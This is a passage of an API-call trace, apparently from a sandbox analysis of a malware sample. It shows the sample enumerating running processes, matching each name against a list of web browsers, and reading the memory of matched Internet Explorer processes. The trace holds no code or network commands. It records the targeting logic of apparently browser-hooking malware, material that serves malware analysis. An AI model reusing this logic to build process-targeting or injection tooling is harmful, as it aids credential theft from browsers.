	[0252.699] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0252.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.699] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.700] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0252.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xa6c8
	[0252.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.701] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0252.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.701] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.701] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0252.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.701] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.702] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0252.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xa6cc
	[0252.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.703] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0252.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.703] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.703] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0252.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.703] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.704] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0252.704] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xa6d0
	[0252.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.704] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0252.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.705] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.705] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0252.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.706] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.706] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0252.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0252.707] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0252.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xa6d4
	[0252.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.708] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0252.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.708] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.709] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0252.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.709] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.710] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0252.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xa6d8
	[0252.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.711] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0252.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.711] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.711] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0252.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.712] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.712] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0252.713] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xa6dc
	[0252.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.713] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0252.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.713] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.713] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0252.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.714] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.714] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0252.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xa6e0
	[0252.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.715] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0252.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.715] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.716] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0252.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.716] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.716] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0252.717] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xa6e4
	[0252.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.717] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0252.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.718] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.721] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0252.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.722] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.722] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0252.723] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xa6e8
	[0252.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.723] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0252.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.723] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.723] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0252.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.724] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.724] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0252.725] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xa6ec
	[0252.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.725] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0252.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.725] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.726] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0252.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.726] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.726] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0252.727] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xa6f0
	[0252.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.727] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0252.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.728] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.729] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0252.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.730] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.730] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0252.731] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xa6f4
	[0252.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.731] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0252.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.731] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.731] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0252.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.732] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.732] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0252.733] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xa6f8
	[0252.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.733] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0252.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.733] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.733] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0252.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.734] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.734] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0252.735] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xa6fc
	[0252.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.735] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0252.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.735] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.736] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0252.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.737] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.737] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0252.738] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xa700
	[0252.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.738] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0252.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.739] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.739] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0252.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.740] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.740] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0252.741] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xa704
	[0252.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.741] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0252.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.742] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.742] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0252.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.743] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.743] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0252.744] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xa708
	[0252.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.744] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0252.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.744] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.745] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0252.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.746] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.746] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0252.747] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xa70c
	[0252.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.747] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0252.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.748] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.748] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0252.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.749] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.749] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0252.750] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xa710
	[0252.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.750] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0252.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.750] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0252.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.750] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0252.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.751] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.751] NtQueryInformationProcess (in: ProcessHandle=0xa710, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0252.751] ReadProcessMemory (in: hProcess=0xa710, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0252.751] ReadProcessMemory (in: hProcess=0xa710, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0252.751] ReadProcessMemory (in: hProcess=0xa710, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0252.751] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0252.753] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0252.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xa714
	[0252.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.754] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0252.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.755] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0252.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.755] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0252.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.755] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.755] NtQueryInformationProcess (in: ProcessHandle=0xa714, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0252.756] ReadProcessMemory (in: hProcess=0xa714, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0252.756] ReadProcessMemory (in: hProcess=0xa714, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0252.756] ReadProcessMemory (in: hProcess=0xa714, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0252.756] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0252.756] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0252.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xa718
	[0252.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.757] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0252.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.757] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.758] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0252.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.758] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.758] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0252.759] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xa71c
	[0252.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.759] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0252.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.759] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.760] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0252.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.760] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
